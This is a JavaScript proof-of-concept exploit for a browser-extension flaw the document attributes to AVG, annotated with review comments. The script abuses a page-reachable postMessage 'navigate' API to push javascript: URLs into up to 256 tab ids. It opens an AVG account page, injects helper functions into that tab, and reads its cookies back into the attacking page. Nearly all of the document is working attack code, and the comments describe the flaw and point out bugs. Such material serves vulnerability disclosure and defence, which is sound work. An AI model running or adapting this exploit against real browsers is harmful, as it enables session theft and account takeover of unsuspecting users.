<script>
|
// Random marker appended to the target window's URL fragment (hash).
// NOTE(review): despite the name, this value is only used as a tag for
// telling tabs apart (it is compared against document.location.hash). It is
// not a cryptographic secret, and Math.random() is not a CSPRNG.
|
var tgtsecret = Math.random().toString(36).substring(8);
|
// Random marker appended to this (host) window's URL fragment, built the same
// way as tgtsecret.
|
var hstsecret = Math.random().toString(36).substring(8);
|
// Target cookie. Starts as null; the only assignment in this listing is the
// string "tgtcookie='...'" that retrieveCookie() sends back to the tab tagged
// with hstsecret. Must stay a global so that injected statement can reach it.
|
var tgtcookie = null;
|
|
// This is the core vulnerability: AVG added a JavaScript API that includes the
// ability to navigate arbitrary tabs.
//
// avgNavigate(url, newtab, tabid) posts a message object of the shape
//   { origin: "web", action: "navigate", data: { url, isNewTab[, tabid] } }
// to this window with targetOrigin "*".
//   url    - address to navigate to; callers in this listing pass both an
//            https: URL and javascript: URLs.
//   newtab - copied to data.isNewTab; when it loosely equals false (==), the
//            tab id is attached as data.tabid.
//   tabid  - id of an existing tab; ignored when newtab is truthy.
|
// NOTE(review): the code that receives this message is not part of this
// listing; presumably it is the extension's page-reachable listener. For
// defenders, the point is that the request originates from ordinary page
// script: a handler like this needs to authenticate the sender, restrict
// which tabs may be addressed, and refuse non-http(s) schemes such as
// javascript:.
//
// Documentation is kept above the function on purpose: the top-level script
// hands this function to injectInTabWithSecret(), which serializes its source
// text with btoa(func), so anything inside the body becomes part of that data.
|
function avgNavigate(url, newtab, tabid)
|
{
|
var message = {
|
origin: "web",
|
action: "navigate",
|
data: {
|
url: url,
|
isNewTab: newtab,
|
},
|
};
|
|
if (newtab == false) {
|
message.data.tabid = tabid;
|
}
|
|
window.postMessage(message, "*");
|
}
|
|
// Search for a tab whose document.location.hash ends with `secret`, and then
// inject the specified script into it.
//
// How it works, as written:
//   1. Builds a javascript: URL that tests the hash suffix and, on a match,
//      runs eval(atob(...)) on the base64-encoded `func`. `func` is passed to
//      btoa(), so callers supply either a string of script or a function
//      (which is coerced to its source text).
//   2. Logs the URL to the console.
//   3. Calls avgNavigate(payload, false, i) for every i from 0 to 0xFF, i.e.
//      256 candidate tab ids. Tabs whose hash does not match evaluate `false`
//      and do nothing else.
|
// NOTE(review): navigating an already-open tab to a javascript: URL runs the
// script in the document that tab currently shows, which is why a navigate
// API that accepts this scheme crosses the same-origin boundary. The loop
// counter `i` is never declared, so it is created as an implicit global.
// `secret` is placed between single quotes in the URL without escaping.
//
// Documentation is kept above the function on purpose: this function is itself
// serialized with btoa(func) by the top-level script, so text inside the body
// becomes part of the encoded data.
|
function injectInTabWithSecret(secret, func)
|
{
|
var payload = "javascript:document.location.hash.endsWith('"
|
+ secret
|
+ "')?eval(atob('"
|
+ btoa(func)
|
+ "')):false;"
|
|
console.log(payload);
|
|
for (i = 0; i < 0x100; i++) {
|
avgNavigate(payload, false, i);
|
}
|
}
|
|
// Reads document.cookie of whichever document this function runs in and sends
// it to the tab tagged with hstsecret. The top-level script injects this
// function into the tab tagged with tgtsecret and then calls it there, so in
// that flow the cookie read is the target page's.
//
// Steps, as written:
//   1. Injects the statement "tgtcookie='<cookie string>';" into the host tab.
//   2. Injects "cookieFound();" into the host tab to display the value.
//   3. Calls setInterval(10000, window.close).
//
// NOTE(review): document.cookie only exposes cookies that are not marked
// HttpOnly, so that attribute limits what this read can return. The
// setInterval arguments are in (delay, callback) order, the reverse of the
// setInterval(callback, delay) signature, so the call as written does not look
// like it schedules window.close - confirm against the intended behaviour.
//
// Documentation is kept above the function on purpose: the function's source
// text is serialized with btoa(func) before being injected.
function retrieveCookie()
|
{
|
injectInTabWithSecret(hstsecret, "tgtcookie='" + document.cookie + "';");
|
injectInTabWithSecret(hstsecret, "cookieFound();");
|
setInterval(10000, window.close);
|
}
|
|
// Displays the retrieved value: writes "Discovered Cookie: " followed by the
// global tgtcookie and a <br> into the current document.
//
// Nothing in this listing calls the function directly; it is invoked by the
// string "cookieFound();" that retrieveCookie() injects into the tab tagged
// with hstsecret.
//
// NOTE(review): tgtcookie is concatenated into document.write() output without
// HTML escaping, so the cookie text is parsed as markup by the host page.
function cookieFound()
|
{
|
document.write("Discovered Cookie: " + tgtcookie + "<br>");
|
}
|
|
// Driver sequence. The statements below depend on running in this order: each
// injected piece relies on names defined by the ones before it.
//
// Adjust my hash so the target can find me: tag this (host) window with
// hstsecret so script running in the target tab can address it later.
|
window.location.hash = hstsecret;
|
|
// Create the target tab: ask the navigate API to open the target origin in a
// new tab, with tgtsecret as the URL fragment so the tab can be recognised.
// The tab id is passed as -1 and is not attached to the message, because
// newtab is true.
|
avgNavigate("https://myaccount.avg.com/#" + tgtsecret, true, -1);
|
|
// Inject some utility functions: both helpers are passed as function objects
// and are serialized to their source text by btoa(func), which defines them
// inside the tab tagged with tgtsecret.
|
injectInTabWithSecret(tgtsecret, avgNavigate);
|
injectInTabWithSecret(tgtsecret, injectInTabWithSecret);
|
|
// Let the target know where we are: define hstsecret in the target tab so
// retrieveCookie() can send its result back to this window.
|
injectInTabWithSecret(tgtsecret, "hstsecret='" + hstsecret + "';");
|
|
// Read the cookie: define retrieveCookie in the target tab, then invoke it
// there. The result comes back through the tgtcookie global and cookieFound().
// NOTE(review): for defenders, the whole chain needs only page script and the
// navigate message; no step here requires user interaction.
|
injectInTabWithSecret(tgtsecret, retrieveCookie);
|
injectInTabWithSecret(tgtsecret, "retrieveCookie()");
|
|
</script>
|